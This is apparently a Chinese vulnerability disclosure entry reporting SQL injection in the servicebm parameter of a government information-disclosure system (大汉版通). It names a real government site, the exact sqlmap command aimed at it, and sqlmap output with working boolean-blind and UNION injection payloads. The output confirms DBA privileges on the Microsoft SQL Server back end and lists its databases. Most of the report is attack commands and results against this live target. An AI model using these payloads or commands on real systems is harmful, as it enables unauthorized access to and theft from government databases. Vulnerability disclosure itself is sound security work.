大汉版通政府信息公开系统SQL注射2

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: SQL ### 详细说明: 政府信息公开系统 某处sql注射漏洞 另一个文件里的参数 注入点 zfxxgk/serviceobjectinfo.jsp?servicebm= servicebm过滤不严存在注射 政府网站案例 sqlmap.py -u "http://xxgk.sihong.gov.cn/zfxxgk/serviceobjectinfo.jsp?s ervicebm=" --is-dba --dbs ``` --- Place: GET Parameter: servicebm Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: servicebm=%' AND 2512=2512 AND '%'=' Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: servicebm=-5118%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NU LL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(104)+CHAR(106)+CHAR(111)+CHAR(113)+CH AR(68)+CHAR(74)+CHAR(85)+CHAR(104)+CHAR(103)+CHAR(84)+CHAR(77)+CHAR(118)+CHAR(10 0)+CHAR(75)+CHAR(113)+CHAR(118)+CHAR(99)+CHAR(111)+CHAR(113),NULL,NULL-- --- [11:57:12] [INFO] the back-end DBMS is Microsoft SQL Server web application technology: JSP back-end DBMS: Microsoft SQL Server 2000 current user is DBA: True ``` DBA权限 看下数据库 available databases [16]: [*] gov [*] jcms [*] jcmsvc...

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息